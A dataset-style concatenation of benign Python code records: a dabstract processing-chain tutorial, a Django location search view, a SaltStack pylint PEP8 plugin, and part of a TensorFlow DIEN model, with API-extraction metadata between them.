output_data = dp(numpyfiles[2],fs=1) #fit from npy files
#output_data = dp('data_intro/data_numpy/2.npy',fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time and fit this to normalization (created from hardcoded configuration)
from dabstract.dataprocessor import ProcessingChain
config = {'chain': [{'name': 'NumpyDatareader'},
{'name': 'Framing',
'parameters': {'axis': 0, 'stepsize': 10, 'windowsize': 10}},
{'name': 'FFT',
'parameters': {'axis': 1}},
{'name': 'Logarithm'},
{'name': 'Aggregation',
'parameters': {'axis': 0,
'combine': 'concatenate',
'methods': ['mean', 'std']}},
{'name': 'Normalizer',
'parameters': {'type': 'standard'}}]}
dp = ProcessingChain(config)
dp.summary()
# OR
# dp = ProcessingChain()
# dp.add(config)
dp.fit(numpyfiles, fs=1) #fit from npy files
#dp.fit(['data_intro/data_numpy/0.npy', 'data_intro/data_numpy/1.npy', 'data_intro/data_numpy/3.npy', ...], fs=1)
output_data = dp(numpyfiles[2],fs=1) #fit from npy files
#output_data = dp('data_intro/data_numpy/2.npy',fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time and fit this to normalization (created from yaml config)
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# get yaml configuration
config = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'))
# create processing chain from the yaml config
dp = ProcessingChain(config)
# fit data
dp.fit(DATA, fs=1)
# process
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Same as before, but now the yaml loading fct and feed to ProcessingChain() is available in a one-liner.
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
# fit data
dp.fit(DATA, fs=1)
# process
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Example on how to add a custom processing layer
# -- processing chain from config BIS
from dabstract.dataprocessor import ProcessingChain, Processor
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# custom processor.
# This is a minimal example of what a processor can do.
class custom_processor(Processor):
def process(self, data, **kwargs):
return data * 100, {}
# return data, information that can be propagated to consecutive layers
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
dp.summary()
# add a custom processor to the dp.chain
dp.add(custom_processor())
dp.summary()
# Fit data to chain
dp.fit(DATA, fs=1)
# process0
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Example on how to add a custom processing with fit option
# -- processing chain from config BIS
from dabstract.dataprocessor import ProcessingChain, Processor
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# custom processor.
# This is a minimal example of what a processor can do.
class custom_processor(Processor):
def process(self, data, **kwargs):
return (data - self.mean) * 100, {}
# return data, information that can be propagated to consecutive layers
def fit(self, data, info, **kwargs):
self.mean = np.mean(data)
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
dp.summary()
# add custom processor
dp.add(custom_processor())
dp.summary()
# fit data (it's recursive, so both the normalizer and the custom_processor are fit'ed on the data)
dp.fit(DATA, fs=1)
# process data
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Example on how to use any function in a dabstract processing chain and still use info propagation
# -- processing chain from config BIS
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
def custom_fct(data,**kwargs):
return (data - 5) * 100
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
dp.summary()
# add custom processors
dp.add(custom_fct)
dp.add(lambda x: x*100)
dp.summary()
# fit data (it's recursive, so both the normalizer and the custom_processor are fit'ed on the data)
dp.fit(DATA, fs=1)
# process data
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Example on how to add a custom processing layer within configuration using !class
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config_custom', path=os.path.join('configs','dp'),post_process=ProcessingChain)
# fit data (it's recursive, so both the normalizer and the custom_processor are fit'ed on the data)
dp.fit(DATA, fs=1)
# process data
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create a lazy data source from disk with additional processing
### Adds a lazy mapping function to DATA and allow multi-example indexing
# -- processing chain for multiple examples
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
from dabstract.abstract.abstract import MapAbstract, DataAbstract
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
# Fit data
dp.fit(DATA, fs=1)
# Make and abstract data source
# you can now access data as with typical indexing
# e.g. datab[0], data[1]
# in this way it accesses DATA[0] and DATA[1] respectively with the additional dp
datab = MapAbstract(DATA,dp, fs=1)
print(datab)
# allow for multi indexing, e.g. data[:] or data[0,1]
datab = DataAbstract(datab, fs=1)
print(datab)
print('\n\n\n')
# -------------------------------------------------------------------------
### Add multi-processing to lazy data source
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
# Fit data
dp.fit(DATA, fs=1)
# Make and abstract data source
# you can now access data as with typical indexing
# e.g. datab[0], data[1]
# in this way it accesses DATA[0] and DATA[1] respectively with the additional dp
datab = MapAbstract(DATA,dp, fs = 1)
print(datab)
# allow for multi indexing, e.g. data[:] or data[0,1]
# and allow for multiprocessing with the workers and buffer_len flag
# indexing is paralellized, but also the iterator is
datab = DataAbstract(datab, workers=2, buffer_len=2)
print(datab)
for k,d in enumerate(datab):
print('Example ' + str(k))
print(d)
|
[
"numpy.random.uniform",
"numpy.save",
"os.makedirs",
"scipy.io.wavfile.write",
"dabstract.abstract.abstract.DataAbstract",
"numpy.mean",
"dabstract.abstract.abstract.MapAbstract",
"os.path.join",
"dabstract.dataprocessor.ProcessingChain"
] |
[((105, 134), 'numpy.random.uniform', 'np.random.uniform', ([], {'size': '(10000)'}), '(size=10000)\n', (122, 134), True, 'import numpy as np\n'), ((161, 196), 'numpy.random.uniform', 'np.random.uniform', ([], {'size': '(10, 10000)'}), '(size=(10, 10000))\n', (178, 196), True, 'import numpy as np\n'), ((273, 311), 'os.makedirs', 'os.makedirs', (['datafolder'], {'exist_ok': '(True)'}), '(datafolder, exist_ok=True)\n', (284, 311), False, 'import os\n'), ((311, 360), 'os.makedirs', 'os.makedirs', (["(datafolder + '_numpy')"], {'exist_ok': '(True)'}), "(datafolder + '_numpy', exist_ok=True)\n", (322, 360), False, 'import os\n'), ((857, 874), 'dabstract.dataprocessor.ProcessingChain', 'ProcessingChain', ([], {}), '()\n', (872, 874), False, 'from dabstract.dataprocessor import ProcessingChain\n'), ((1631, 1648), 'dabstract.dataprocessor.ProcessingChain', 'ProcessingChain', ([], {}), '()\n', (1646, 1648), False, 'from dabstract.dataprocessor import ProcessingChain\n'), ((2197, 2214), 'dabstract.dataprocessor.ProcessingChain', 'ProcessingChain', ([], {}), '()\n', (2212, 2214), False, 'from dabstract.dataprocessor import ProcessingChain\n'), ((2984, 3001), 'dabstract.dataprocessor.ProcessingChain', 'ProcessingChain', ([], {}), '()\n', (2999, 3001), False, 'from dabstract.dataprocessor import ProcessingChain\n'), ((3888, 3905), 'dabstract.dataprocessor.ProcessingChain', 'ProcessingChain', ([], {}), '()\n', (3903, 3905), False, 'from dabstract.dataprocessor import ProcessingChain\n'), ((5318, 5341), 'dabstract.dataprocessor.ProcessingChain', 'ProcessingChain', (['config'], {}), '(config)\n', (5333, 5341), False, 'from dabstract.dataprocessor import ProcessingChain\n'), ((6210, 6233), 'dabstract.dataprocessor.ProcessingChain', 'ProcessingChain', (['config'], {}), '(config)\n', (6225, 6233), False, 'from dabstract.dataprocessor import ProcessingChain\n'), ((11558, 11585), 'dabstract.abstract.abstract.MapAbstract', 'MapAbstract', (['DATA', 'dp'], {'fs': '(1)'}), '(DATA, dp, fs=1)\n', (11569, 11585), False, 'from dabstract.abstract.abstract import MapAbstract, DataAbstract\n'), ((11660, 11685), 'dabstract.abstract.abstract.DataAbstract', 'DataAbstract', (['datab'], {'fs': '(1)'}), '(datab, fs=1)\n', (11672, 11685), False, 'from dabstract.abstract.abstract import MapAbstract, DataAbstract\n'), ((12389, 12416), 'dabstract.abstract.abstract.MapAbstract', 'MapAbstract', (['DATA', 'dp'], {'fs': '(1)'}), '(DATA, dp, fs=1)\n', (12400, 12416), False, 'from dabstract.abstract.abstract import MapAbstract, DataAbstract\n'), ((12615, 12659), 'dabstract.abstract.abstract.DataAbstract', 'DataAbstract', (['datab'], {'workers': '(2)', 'buffer_len': '(2)'}), '(datab, workers=2, buffer_len=2)\n', (12627, 12659), False, 'from dabstract.abstract.abstract import MapAbstract, DataAbstract\n'), ((529, 554), 'numpy.save', 'np.save', (['numpyfiles[k]', 'D'], {}), '(numpyfiles[k], D)\n', (536, 554), True, 'import numpy as np\n'), ((559, 599), 'scipy.io.wavfile.write', 'audio_write', (['wavfiles[k]'], {'rate': '(1)', 'data': 'D'}), '(wavfiles[k], rate=1, data=D)\n', (570, 599), True, 'from scipy.io.wavfile import write as audio_write\n'), ((6128, 6157), 'os.path.join', 'os.path.join', (['"""configs"""', '"""dp"""'], {}), "('configs', 'dp')\n", (6140, 6157), False, 'import os\n'), ((6794, 6823), 'os.path.join', 'os.path.join', (['"""configs"""', '"""dp"""'], {}), "('configs', 'dp')\n", (6806, 6823), False, 'import os\n'), ((7667, 7696), 'os.path.join', 'os.path.join', (['"""configs"""', '"""dp"""'], {}), "('configs', 'dp')\n", (7679, 7696), False, 'import os\n'), ((8610, 8623), 'numpy.mean', 'np.mean', (['data'], {}), '(data)\n', (8617, 8623), True, 'import numpy as np\n'), ((8743, 8772), 'os.path.join', 'os.path.join', (['"""configs"""', '"""dp"""'], {}), "('configs', 'dp')\n", (8755, 8772), False, 'import os\n'), ((9624, 9653), 'os.path.join', 'os.path.join', (['"""configs"""', '"""dp"""'], {}), "('configs', 'dp')\n", (9636, 9653), False, 'import os\n'), ((10415, 10444), 'os.path.join', 'os.path.join', (['"""configs"""', '"""dp"""'], {}), "('configs', 'dp')\n", (10427, 10444), False, 'import os\n'), ((11271, 11300), 'os.path.join', 'os.path.join', (['"""configs"""', '"""dp"""'], {}), "('configs', 'dp')\n", (11283, 11300), False, 'import os\n'), ((12102, 12131), 'os.path.join', 'os.path.join', (['"""configs"""', '"""dp"""'], {}), "('configs', 'dp')\n", (12114, 12131), False, 'import os\n')]
|
from django.shortcuts import render
from django.http import HttpResponse, HttpResponseRedirect, JsonResponse
from .models import Location
# ...
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
# Other views not displayed.
def detail(request, location_id):
location = Location.objects.get(id=location_id)
return render(request, 'detail.html', {'location': location})
def search(request):
search_val = request.GET.get('search', None)
if (search_val != None):
results = []
locations = Location.objects.filter(name__icontains=search_val)
for location in locations:
json = {}
json['name'] = location.name
json['link'] = '/' + str(location.id) + '/'
results.append(json)
return JsonResponse({'results':results})
else:
return render(request, 'search.html')
|
[
"django.shortcuts.render",
"django.http.JsonResponse"
] |
[((361, 415), 'django.shortcuts.render', 'render', (['request', '"""detail.html"""', "{'location': location}"], {}), "(request, 'detail.html', {'location': location})\n", (367, 415), False, 'from django.shortcuts import render\n'), ((813, 847), 'django.http.JsonResponse', 'JsonResponse', (["{'results': results}"], {}), "({'results': results})\n", (825, 847), False, 'from django.http import HttpResponse, HttpResponseRedirect, JsonResponse\n'), ((872, 902), 'django.shortcuts.render', 'render', (['request', '"""search.html"""'], {}), "(request, 'search.html')\n", (878, 902), False, 'from django.shortcuts import render\n')]
|
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`<NAME> (<EMAIL>)`
:copyright: © 2013 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
===================
PEP-8 PyLint Plugin
===================
A bridge between the `pep8`_ library and PyLint
.. _`pep8`: http://pep8.readthedocs.org
'''
# ----- DEPRECATED PYLINT PLUGIN ------------------------------------------------------------------------------------>
# This Pylint plugin is deprecated. Development continues on the SaltPyLint package
# <---- DEPRECATED PYLINT PLUGIN -------------------------------------------------------------------------------------
from __future__ import absolute_import
import sys
import logging
import warnings
# Import PyLint libs
from pylint.interfaces import IRawChecker
from pylint.checkers import BaseChecker
from pylint.__pkginfo__ import numversion as pylint_version_info
# Import PEP8 libs
try:
from pep8 import StyleGuide, BaseReport
HAS_PEP8 = True
except ImportError:
HAS_PEP8 = False
warnings.warn(
'No pep8 library could be imported. No PEP8 check\'s will be done',
RuntimeWarning
)
_PROCESSED_NODES = {}
_KNOWN_PEP8_IDS = []
_UNHANDLED_PEP8_IDS = []
if HAS_PEP8 is True:
class PyLintPEP8Reporter(BaseReport):
def __init__(self, options):
super(PyLintPEP8Reporter, self).__init__(options)
self.locations = []
def error(self, line_number, offset, text, check):
code = super(PyLintPEP8Reporter, self).error(
line_number, offset, text, check
)
if code:
# E123, at least, is not reporting it's code in the above call,
# don't want to bother about that now
self.locations.append((code, line_number))
class _PEP8BaseChecker(BaseChecker):
__implements__ = IRawChecker
name = 'pep8'
priority = -1
options = ()
msgs = None
_msgs = {}
msgs_map = {}
def __init__(self, linter=None):
# To avoid PyLints deprecation about a missing symbolic name and
# because I don't want to add descriptions, let's make the descriptions
# equal to the messages.
if self.msgs is None:
self.msgs = {}
for code, (message, symbolic) in self._msgs.iteritems():
self.msgs[code] = (message, symbolic, message)
BaseChecker.__init__(self, linter=linter)
def process_module(self, node):
'''
process a module
the module's content is accessible via node.file_stream object
'''
if node.path not in _PROCESSED_NODES:
stylechecker = StyleGuide(
parse_argv=False, config_file=True, quiet=2,
reporter=PyLintPEP8Reporter
)
_PROCESSED_NODES[node.path] = stylechecker.check_files([node.path])
for code, lineno in _PROCESSED_NODES[node.path].locations:
pylintcode = '{0}8{1}'.format(code[0], code[1:])
if pylintcode in self.msgs_map:
# This will be handled by PyLint itself, skip it
continue
if pylintcode not in _KNOWN_PEP8_IDS:
if pylintcode not in _UNHANDLED_PEP8_IDS:
_UNHANDLED_PEP8_IDS.append(pylintcode)
msg = 'The following code, {0}, was not handled by the PEP8 plugin'.format(pylintcode)
if logging.root.handlers:
logging.getLogger(__name__).warning(msg)
else:
sys.stderr.write('{0}\n'.format(msg))
continue
if pylintcode not in self._msgs:
# Not for our class implementation to handle
continue
if code in ('E111', 'E113'):
if _PROCESSED_NODES[node.path].lines[lineno-1].strip().startswith('#'):
# If E111 is triggered in a comment I consider it, at
# least, bad judgement. See https://github.com/jcrocholl/pep8/issues/300
# If E113 is triggered in comments, which I consider a bug,
# skip it. See https://github.com/jcrocholl/pep8/issues/274
continue
self.add_message(pylintcode, line=lineno, args=code)
class PEP8Indentation(_PEP8BaseChecker):
'''
Process PEP8 E1 codes
'''
_msgs = {
'E8101': ('PEP8 %s: indentation contains mixed spaces and tabs',
'indentation-contains-mixed-spaces-and-tabs'),
'E8111': ('PEP8 %s: indentation is not a multiple of four',
'indentation-is-not-a-multiple-of-four'),
'E8112': ('PEP8 %s: expected an indented block',
'expected-an-indented-block'),
'E8113': ('PEP8 %s: unexpected indentation',
'unexpected-indentation'),
'E8121': ('PEP8 %s: continuation line indentation is not a multiple of four',
'continuation-line-indentation-is-not-a-multiple-of-four'),
'E8122': ('PEP8 %s: continuation line missing indentation or outdented',
'continuation-line-missing-indentation-or-outdented'),
'E8123': ("PEP8 %s: closing bracket does not match indentation of opening bracket's line",
"closing-bracket-does-not-match-indentation-of-opening-bracket's-line"),
'E8124': ('PEP8 %s: closing bracket does not match visual indentation',
'closing-bracket-does-not-match-visual-indentation'),
'E8125': ('PEP8 %s: continuation line does not distinguish itself from next logical line',
'continuation-line-does-not-distinguish-itself-from-next-logical-line'),
'E8126': ('PEP8 %s: continuation line over-indented for hanging indent',
'continuation-line-over-indented-for-hanging-indent'),
'E8127': ('PEP8 %s: continuation line over-indented for visual indent',
'continuation-line-over-indented-for-visual-indent'),
'E8128': ('PEP8 %s: continuation line under-indented for visual indent',
'continuation-line-under-indented-for-visual-indent'),
'E8129': ('PEP8 %s: visually indented line with same indent as next logical line',
'visually-indented-line-with-same-indent-as-next-logical-line'),
'E8131': ('PEP8 %s: unaligned for hanging indent',
'unaligned-for-hanging-indent'),
'E8133': ('PEP8 %s: closing bracket is missing indentation',
'closing-bracket-is-missing-indentation'),
}
msgs_map = {
'E8126': 'C0330'
}
class PEP8Whitespace(_PEP8BaseChecker):
'''
Process PEP8 E2 codes
'''
_msgs = {
'E8201': ("PEP8 %s: whitespace after '('", "whitespace-after-'('"),
'E8202': ("PEP8 %s: whitespace before ')'", "whitespace-before-')'"),
'E8203': ("PEP8 %s: whitespace before ':'", "whitespace-before-':'"),
'E8211': ("PEP8 %s: whitespace before '('", "whitespace-before-'('"),
'E8221': ('PEP8 %s: multiple spaces before operator',
'multiple-spaces-before-operator'),
'E8222': ('PEP8 %s: multiple spaces after operator',
'multiple-spaces-after-operator'),
'E8223': ('PEP8 %s: tab before operator', 'tab-before-operator'),
'E8224': ('PEP8 %s: tab after operator', 'tab-after-operator'),
'E8225': ('PEP8 %s: missing whitespace around operator',
'missing-whitespace-around-operator'),
'E8226': ('PEP8 %s: missing whitespace around arithmetic operator',
'missing-whitespace-around-arithmetic-operator'),
'E8227': ('PEP8 %s: missing whitespace around bitwise or shift operator',
'missing-whitespace-around-bitwise-or-shift-operator'),
'E8228': ('PEP8 %s: missing whitespace around modulo operator',
'missing-whitespace-around-modulo-operator'),
'E8231': ("PEP8 %s: missing whitespace after ','",
"missing-whitespace-after-','"),
'E8241': ("PEP8 %s: multiple spaces after ','", "multiple-spaces-after-','"),
'E8242': ("PEP8 %s: tab after ','", "tab-after-','"),
'E8251': ('PEP8 %s: unexpected spaces around keyword / parameter equals',
'unexpected-spaces-around-keyword-/-parameter-equals'),
'E8261': ('PEP8 %s: at least two spaces before inline comment',
'at-least-two-spaces-before-inline-comment'),
'E8262': ("PEP8 %s: inline comment should start with '# '",
"inline-comment-should-start-with-'#-'"),
'E8265': ("PEP8 %s: block comment should start with '# '",
"block-comment-should-start-with-'# '"),
'E8271': ('PEP8 %s: multiple spaces after keyword',
'multiple-spaces-after-keyword'),
'E8272': ('PEP8 %s: multiple spaces before keyword',
'multiple-spaces-before-keyword'),
'E8273': ('PEP8 %s: tab after keyword', 'tab-after-keyword'),
'E8274': ('PEP8 %s: tab before keyword', 'tab-before-keyword'),
}
msgs_map = {
'E8222': 'C0326',
'E8225': 'C0326',
'E8251': 'C0326'
}
class PEP8BlankLine(_PEP8BaseChecker):
'''
Process PEP8 E3 codes
'''
_msgs = {
'E8301': ('PEP8 %s: expected 1 blank line, found 0',
'expected-1-blank-line,-found-0'),
'E8302': ('PEP8 %s: expected 2 blank lines, found 0',
'expected-2-blank-lines,-found-0'),
'E8303': ('PEP8 %s: too many blank lines (3)',
'too-many-blank-lines-(3)'),
'E8304': ('PEP8 %s: blank lines found after function decorator',
'blank-lines-found-after-function-decorator'),
}
class PEP8Import(_PEP8BaseChecker):
'''
Process PEP8 E4 codes
'''
_msgs = {
'E8401': ('PEP8 %s: multiple imports on one line',
'multiple-imports-on-one-line'),
}
class PEP8LineLength(_PEP8BaseChecker):
'''
Process PEP8 E5 codes
'''
_msgs = {
'E8501': ('PEP8 %s: line too long (82 > 79 characters)',
'line-too-long-(82->-79-characters)'),
'E8502': ('PEP8 %s: the backslash is redundant between brackets',
'the-backslash-is-redundant-between-brackets')
}
msgs_map = {
'E8501': 'C0301'
}
class PEP8Statement(_PEP8BaseChecker):
'''
Process PEP8 E7 codes
'''
_msgs = {
'E8701': ('PEP8 %s: multiple statements on one line (colon)',
'multiple-statements-on-one-line-(colon)'),
'E8702': ('PEP8 %s: multiple statements on one line (semicolon)',
'multiple-statements-on-one-line-(semicolon)'),
'E8703': ('PEP8 %s: statement ends with a semicolon',
'statement-ends-with-a-semicolon'),
'E8711': ("PEP8 %s: comparison to None should be 'if cond is None:'",
"comparison-to-None-should-be-'if-cond-is-None:'"),
'E8712': ("PEP8 %s: comparison to True should be 'if cond is True:' or 'if cond:'",
"comparison-to-True-should-be-'if-cond-is-True:'-or-'if-cond:'"),
'E8713': ("PEP8 %s: test for membership should be 'not in'",
"test-for-membership-should-be 'not in'"),
'E8714': ("PEP8 %s: test for object identity should be 'is not'",
"test-for-object-identity-should-be-'is not'"),
'E8721': ("PEP8 %s: do not compare types, use 'isinstance()'",
"do-not-compare-types,-use-'isinstance()'"),
}
class PEP8Runtime(_PEP8BaseChecker):
'''
Process PEP8 E9 codes
'''
_msgs = {
'E8901': ('PEP8 %s: SyntaxError or IndentationError',
'SyntaxError-or-IndentationError'),
'E8902': ('PEP8 %s: IOError', 'IOError'),
}
class PEP8IndentationWarning(_PEP8BaseChecker):
'''
Process PEP8 W1 codes
'''
_msgs = {
'W8191': ('PEP8 %s: indentation contains tabs',
'indentation-contains-tabs'),
}
class PEP8WhitespaceWarning(_PEP8BaseChecker):
'''
Process PEP8 W2 codes
'''
_msgs = {
'W8291': ('PEP8 %s: trailing whitespace',
'trailing-whitespace' if pylint_version_info < (1, 0) else
'pep8-trailing-whitespace'),
'W8292': ('PEP8 %s: no newline at end of file', 'no-newline-at-end-of-file'),
'W8293': ('PEP8 %s: blank line contains whitespace',
'blank-line-contains-whitespace'),
}
msgs_map = {
'W8291': 'C0303',
'W8293': 'C0303'
}
class PEP8BlankLineWarning(_PEP8BaseChecker):
'''
Process PEP8 W3 codes
'''
_msgs = {
'W8391': ('PEP8 %s: blank line at end of file',
'blank-line-at-end-of-file'),
}
class PEP8DeprecationWarning(_PEP8BaseChecker):
'''
Process PEP8 W6 codes
'''
_msgs = {
'W8601': ("PEP8 %s: .has_key() is deprecated, use 'in'",
".has_key()-is-deprecated,-use-'in'"),
'W8602': ('PEP8 %s: deprecated form of raising exception',
'deprecated-form-of-raising-exception'),
'W8603': ("PEP8 %s: '<>' is deprecated, use '!='",
"'<>'-is-deprecated,-use-'!='"),
'W8604': ("PEP8 %s: backticks are deprecated, use 'repr()'",
"backticks-are-deprecated,-use-'repr()'")
}
# ----- Keep Track Of Handled PEP8 MSG IDs -------------------------------------------------------------------------->
for checker in locals().values():
try:
if issubclass(checker, _PEP8BaseChecker):
_KNOWN_PEP8_IDS.extend(checker._msgs.keys())
except TypeError:
# Not class
continue
# <---- Keep Track Of Handled PEP8 MSG IDs ---------------------------------------------------------------------------
def register(linter):
'''
required method to auto register this checker
'''
if HAS_PEP8 is False:
return
linter.register_checker(PEP8Indentation(linter))
linter.register_checker(PEP8Whitespace(linter))
linter.register_checker(PEP8BlankLine(linter))
linter.register_checker(PEP8Import(linter))
linter.register_checker(PEP8LineLength(linter))
linter.register_checker(PEP8Statement(linter))
linter.register_checker(PEP8Runtime(linter))
linter.register_checker(PEP8IndentationWarning(linter))
linter.register_checker(PEP8WhitespaceWarning(linter))
linter.register_checker(PEP8BlankLineWarning(linter))
linter.register_checker(PEP8DeprecationWarning(linter))
|
[
"pep8.StyleGuide",
"warnings.warn",
"pylint.checkers.BaseChecker.__init__",
"logging.getLogger"
] |
[((1090, 1191), 'warnings.warn', 'warnings.warn', (['"""No pep8 library could be imported. No PEP8 check\'s will be done"""', 'RuntimeWarning'], {}), '("No pep8 library could be imported. No PEP8 check\'s will be done"\n , RuntimeWarning)\n', (1103, 1191), False, 'import warnings\n'), ((2464, 2505), 'pylint.checkers.BaseChecker.__init__', 'BaseChecker.__init__', (['self'], {'linter': 'linter'}), '(self, linter=linter)\n', (2484, 2505), False, 'from pylint.checkers import BaseChecker\n'), ((2737, 2826), 'pep8.StyleGuide', 'StyleGuide', ([], {'parse_argv': '(False)', 'config_file': '(True)', 'quiet': '(2)', 'reporter': 'PyLintPEP8Reporter'}), '(parse_argv=False, config_file=True, quiet=2, reporter=\n PyLintPEP8Reporter)\n', (2747, 2826), False, 'from pep8 import StyleGuide, BaseReport\n'), ((3557, 3584), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (3574, 3584), False, 'import logging\n')]
|
import tensorflow as tf
from tensorflow import keras
def compute_his_average(his_embedding, mask):
"""
:param his_embedding: None,his_len,embedding_size
:param mask: None,his_len
:return:his_embedding_average
"""
mask = tf.expand_dims(mask, axis=-1)
mask = tf.cast(mask, dtype=his_embedding.dtype)
his_embedding *= mask
mask_sum = tf.reduce_sum(mask, axis=1) # None,1
embedding_sum = tf.reduce_sum(his_embedding, axis=1)
his_embedding_average = embedding_sum / mask_sum
return his_embedding_average
class MLP(keras.layers.Layer):
def __init__(self, units, last_activation):
super().__init__()
self.bn = keras.layers.BatchNormalization()
self.mlp = [keras.layers.Dense(unit, activation='relu') for unit in units[:-1]]
self.mlp.append(keras.layers.Dense(units[-1], activation=last_activation))
def call(self, inputs, training=False):
inputs = self.bn(inputs, training=training)
for layer in self.mlp:
inputs = layer(inputs)
return inputs
class LocalActivationUnit(tf.keras.layers.Layer):
def __init__(self):
super().__init__()
self.layer_1 = tf.keras.layers.Dense(80, activation=tf.nn.sigmoid)
self.layer_2 = tf.keras.layers.Dense(40, activation=tf.nn.sigmoid)
self.layer_3 = tf.keras.layers.Dense(1)
def call(self, inputs, mask=None):
"""
:param target: None,1,embedding_size
:param history: None,history_max_length,embedding_size
:param mask: None,history_max_length
:return:
"""
target, history = inputs
target = tf.repeat(target, repeats=[history.shape[1]], axis=1) # None,his_max_length,embedding_size
concat = tf.concat([target, history, target - history, target * history], axis=-1)
weights = self.layer_1(concat)
weights = self.layer_2(weights)
weights = self.layer_3(weights) # None,history_max_length,1
mask = tf.expand_dims(mask, axis=-1) # None,history_max_length,1
mask = tf.cast(mask, dtype=weights.dtype)
weights *= mask
history_representation = tf.matmul(weights, history, transpose_a=True) # None,1,embedding_size
history_representation = tf.squeeze(history_representation, axis=1)
return history_representation
class AuxiliaryNet(keras.layers.Layer):
def __init__(self, mlp_units):
super(AuxiliaryNet, self).__init__()
# self.bn = keras.layers.BatchNormalization()
self.layers = [keras.layers.Dense(unit, activation='sigmoid') for unit in mlp_units[:-1]]
self.layers.append(keras.layers.Dense(mlp_units[-1], activation=None))
def call(self, inputs, training=False, **kwargs):
# inputs = self.bn(inputs, training=training)
for layer in self.layers:
inputs = layer(inputs)
return inputs
class InterestExtract(keras.layers.Layer):
def __init__(self, gru_units):
super().__init__()
self.gru = keras.layers.GRU(units=gru_units, return_sequences=True)
self.auxiliary_net = AuxiliaryNet([80, 40, 1])
def compute_logits(self, inputs, training=False):
hidden_state, history = inputs
concat = tf.concat([hidden_state, history], axis=-1)
logits = self.auxiliary_net(concat, training=training)
logits = tf.squeeze(logits, axis=-1)
return logits
def compute_auxiliary_loss(self, inputs, training=False, mask=None):
hidden_state, pos_his_embedding, neg_his_embedding = inputs
hidden_state = hidden_state[:, :-1, :]
pos_history = pos_his_embedding[:, 1:, :]
neg_history = neg_his_embedding[:, 1:, :]
mask = mask[:, 1:]
pos_logits = self.compute_logits((hidden_state, pos_history), training) # None,his_len
neg_logits = self.compute_logits((hidden_state, neg_history), training) # None,his_len
pos_label = tf.ones_like(pos_logits)
neg_label = tf.zeros_like(neg_logits)
pos_loss = tf.nn.sigmoid_cross_entropy_with_logits(pos_label, pos_logits) # None,his_len
neg_loss = tf.nn.sigmoid_cross_entropy_with_logits(neg_label, neg_logits) # None,his_len
mask = tf.cast(mask, pos_loss.dtype)
pos_loss *= mask
neg_loss *= mask
auxiliary_loss_concat = tf.concat([pos_loss, neg_loss], axis=-1)
auxiliary_loss_sum = tf.reduce_sum(auxiliary_loss_concat, axis=-1) # None,
mask_sum = tf.reduce_sum(mask, axis=-1) * 2.
auxiliary_loss = auxiliary_loss_sum / mask_sum
return auxiliary_loss # None,
# https://github.com/mouna99/dien.git implementation
# click_input_ = tf.concat([hidden_state, pos_history], -1) # None,his_len,embedding_size
# noclick_input_ = tf.concat([hidden_state, neg_history], -1) # None,his_len,embedding_size
# click_prop_ = self.mlp(click_input_, training)
# click_prop_ = tf.sigmoid(click_prop_)
# click_prop_ = tf.squeeze(click_prop_, axis=-1) # None,his_len
# noclick_prop_ = self.mlp(noclick_input_, training)
# noclick_prop_ = tf.sigmoid(noclick_prop_)
# noclick_prop_ = tf.squeeze(noclick_prop_, axis=-1) # None,his_len
# click_loss_ = - tf.math.log(click_prop_) * mask
# noclick_loss_ = - tf.math.log(1.0 - noclick_prop_) * mask
# loss_ = click_loss_ + noclick_loss_
# # loss_ = tf.reduce_mean(loss_)
# return loss_
def call(self, inputs, training=False, mask=None):
"""
pos_his: None,his_len,input_size
neg_his: None,his_len,input_size
mask: None,his_len
"""
pos_history, neg_history = inputs
hidden_state = self.gru(pos_history, mask=mask)
auxiliary_loss = self.compute_auxiliary_loss((hidden_state, pos_history, neg_history), training, mask)
return hidden_state, auxiliary_loss
class DIENAttention(keras.layers.Layer):
def __init__(self):
super().__init__()
def build(self, input_shape):
